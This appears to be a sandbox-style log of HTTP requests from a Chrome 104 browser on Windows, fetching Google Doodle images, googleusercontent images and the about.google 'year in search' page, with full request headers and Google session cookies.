    Source: global trafficHTTP traffic detected: GET /logos/doodles/2019/gamila-el-alailys-112th-birthday-6036329396699136-2x.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /bT4TRpcZTcPqGbDgGXBdUty2CyQ_sJtQ4s-64-SRkkZw3fObWd8EpEyxljydj79TDBZZD3Q_lHXDkxbdQWx443udWcpnpzexSkSxGD42GA=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2019/tunisia-national-day-2019-5078217890201600.2-2xa.gif HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2019/spring-equinox-2019-northern-hemisphere-5139135894388736-2x.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2019/fall-equinox-2019-southern-hemisphere-5334567442448384-2x.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /gG7E-il42mOcA4BFm8CCSre-bGncM7LG4CEC6qvhoFog6buhLTlixRBjgofIsPFO-hFkn1eDmmP6qlWpNHeO9qv5dVmqbjF6Up6oLV_I=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /yUfZC3C2Zy7jpvG0VIa0JY6deVELiJXaXOPx18ZYtHvHJDBKOhGLc9S0e2bXc3t8OdDyMbr6at7dqFWUzUspazqgpKlmdO3_YQHGmqPT=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /S2YXjtSfM-nTFgL7NVN1Tq5pWVcOPb0tjeG_BzjraNGRtkr-HFaSBG4OpePt7naldeQvWoExSs2K-JmFB5ttVh-fiS-KPuRf40fojUof=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /FhIwYfdhqW6ygU9DnZnr2VCxVaIU6sivlBaa91wIuTB7cox40KZfT2EnyKjdCyute5w1ewVzc3N3G3DWFVngy0kFy2YC9JU7WlwUFmtj=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /R3qBk5xW_52Z6Rit39SW--TTlXpogLb7RCor5-tdRx7X6ykqM_0Lh0Rji5M6Oz1FLG8Paqh4aRabiP3JrlFPGal5R1P8MGlohZ0-753zbQ=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2018/spring-equinox-2018-5263345362927616-2xa.gif HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2018/tunisia-national-day-6461049875202048.4-2xa.gif HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /e7gO_KgBDTqqeWioKwa3ZWaK155IbBsnaB0n89ZTR4RBmvRPnOhBXOKOi_nBeT3OvcVxRXHcoFTY6g2i_ONX3uvB2SjFIM80LewujfCV=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2018/fall-equinox-2018-6545460612300800.2-2xa.gif HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2018/usmar-ismails-97th-birthday-6322954328604672-2x.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2016/icc-sri-lanka-v-west-indies-4888550698909696-hp2x.jpg HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2017/first-day-of-spring-2017-northern-hemisphere-5171021979058176-2xa.gif HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /3l4wROvUwcnbW_GsR0BdH1f--Wd9SIagmwpo9_C-5xUynH6zITpBwx_acG3e0TUNpmfEOsRneH-q-E3CmnVfjxKlnN3JdeI2rCQT4JI=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2016/tunisia-national-day-2016-5102192186884096-hp2x.jpg HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2017/first-day-of-fall-2017-southern-hemisphere-5673416651702272-hp2x.gif HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2015/cricket-world-cup-2015-quarterfinals-3-australia-vs-pakistan-5655610641088512-hp.jpg HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2016/first-day-of-spring-2016-northern-hemisphere-5727786629070848-hp2x.gif HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2014/tunisia-independance-day-5364643732127744-hp2x.jpg HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2016/first-day-of-fall-2016-southern-hemisphere-5703954739494912-hp2x.gif HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2014/first-day-of-spring-2014-5086324449083392-hp2x.jpg HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2014/first-day-of-fall-2014-6370654056087552-hp2x.jpg HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /logos/2011/holi11-hp.jpg HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /stories/year-in-search/ HTTP/1.1Host: about.googleConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://about.google/?hl=en-USAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.2074760332.1679378274; _gat_UA-69658807-1=1; _gat_UA-69658807-2=1; _ga=GA1.2.2144369805.1679378274; _ga_YGRLMNPG7B=GS1.1.1679378274.1.0.1679378284.0.0.0
